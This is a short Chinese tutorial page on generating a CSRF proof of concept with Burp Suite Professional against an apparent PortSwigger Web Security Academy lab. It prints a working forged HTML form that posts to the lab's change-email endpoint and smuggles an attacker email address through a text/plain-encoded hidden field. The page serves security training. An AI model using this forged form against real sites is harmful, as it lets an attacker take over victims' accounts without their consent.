当前位置: 首页 > news >正文

如何通过Burp Suite专业版构建CSRF PoC

news 来源:原创 2024/5/19 17:25:07

Burp Suite是一款强大的渗透测试利器,可以利用它来高效的执行渗透攻击,接下来介绍如何通过Burp Suite Pro来构建CSRF PoC。

  1. 在Bupr中找到拦截的请求,右键选择Engagement tools => Generate CSRF PoC
    在这里插入图片描述
  2. 利用CSRF PoC生成器自动生成HTML
<html><!-- CSRF PoC - generated by Burp Suite Professional --><body><script>history.pushState('', '', '/')</script><form action="https://0a50007d0353381f8795a7ae004c001b.web-security-academy.net/my-account/change-email" method="POST" enctype="text/plain"><input type="hidden" name="csrf" value="ztEXkyKgBF1CquUx7mGtX5VHoeTxBZGw&amp;email&#61;attacker&#64;163&#46;com" /><input type="submit" value="Submit request" /></form></body>
</html>

  1. 对生成的HTML根据攻击需要做出相应调整

  2. 将生成的HTML复制到网页中,登录到易受攻击的网站的浏览器中查看,测试是否成功发出了预期的请求并执行了相应操作。
    在这里插入图片描述

    在这里插入图片描述

参考

[1] https://portswigger.net/web-security/cross-site-scripting/exploiting/lab-perform-csrf

推荐阅读
「 典型安全漏洞系列 」03.跨站请求伪造CSRF详解
「 典型安全漏洞系列 」02.SQL注入详解
「 典型安全漏洞系列 」01.跨站脚本攻击XSS详解

相关文章:

  • 【纯CSS特效源码】(二)精美的立体字
  • JavaScript基础05
  • css 怎么绘制一个带圆角的渐变色的边框
  • UGUI Image图像控件替换图片
  • Java 8 中的 Stream 轻松遍历树形结构
  • 视频转为序列图的软件,让视频批量转为序列图
  • Object.keys()
  • Go语言学习记录——用正则表达式(regexp包)来校验参数
  • mysql进阶-索引基础
  • 高效构建Java应用:Maven入门和进阶(五)
  • 【JavaScript】es6开发常用技巧
  • Page 251~254 Win32 GUI项目
  • 使用MATLAB连接USRP
  • 6、C语言:输入与输出
  • [学习笔记]刘知远团队大模型技术与交叉应用L1-NLPBig Model Basics
  • 【许晓笛】 EOS 智能合约案例解析(3)
  • 〔开发系列〕一次关于小程序开发的深度总结
  • angular2 简述
  • canvas 五子棋游戏
  • docker-consul
  • ECMAScript6(0):ES6简明参考手册
  • E-HPC支持多队列管理和自动伸缩
  • leetcode46 Permutation 排列组合
  • ng6--错误信息小结(持续更新)
  • PHP 使用 Swoole - TaskWorker 实现异步操作 Mysql
  • Python利用正则抓取网页内容保存到本地
  • Web设计流程优化:网页效果图设计新思路
  • XForms - 更强大的Form
  • 阿里研究院入选中国企业智库系统影响力榜
  • 技术发展面试
  • 驱动程序原理
  • 学习笔记TF060:图像语音结合,看图说话
  • 用mpvue开发微信小程序
  • 智能合约开发环境搭建及Hello World合约
  • 长三角G60科创走廊智能驾驶产业联盟揭牌成立,近80家企业助力智能驾驶行业发展 ...
  • ​queue --- 一个同步的队列类​
  • #我与Java虚拟机的故事#连载10: 如何在阿里、腾讯、百度、及字节跳动等公司面试中脱颖而出...
  • #我与Java虚拟机的故事#连载18:JAVA成长之路
  • $jQuery 重写Alert样式方法
  • (2009.11版)《网络管理员考试 考前冲刺预测卷及考点解析》复习重点
  • (rabbitmq的高级特性)消息可靠性
  • (Spark3.2.0)Spark SQL 初探: 使用大数据分析2000万KF数据
  • (博弈 sg入门)kiki's game -- hdu -- 2147
  • (附源码)springboot掌上博客系统 毕业设计063131
  • (附源码)计算机毕业设计ssm基于B_S的汽车售后服务管理系统
  • (入门自用)--C++--抽象类--多态原理--虚表--1020
  • *** 2003
  • .gitattributes 文件
  • .NET 8 编写 LiteDB vs SQLite 数据库 CRUD 接口性能测试(准备篇)
  • .net(C#)中String.Format如何使用
  • .Net6使用WebSocket与前端进行通信
  • .NET简谈互操作(五:基础知识之Dynamic平台调用)
  • @开发者,一文搞懂什么是 C# 计时器!
  • [20161214]如何确定dbid.txt
  • [20170705]lsnrctl status LISTENER_SCAN1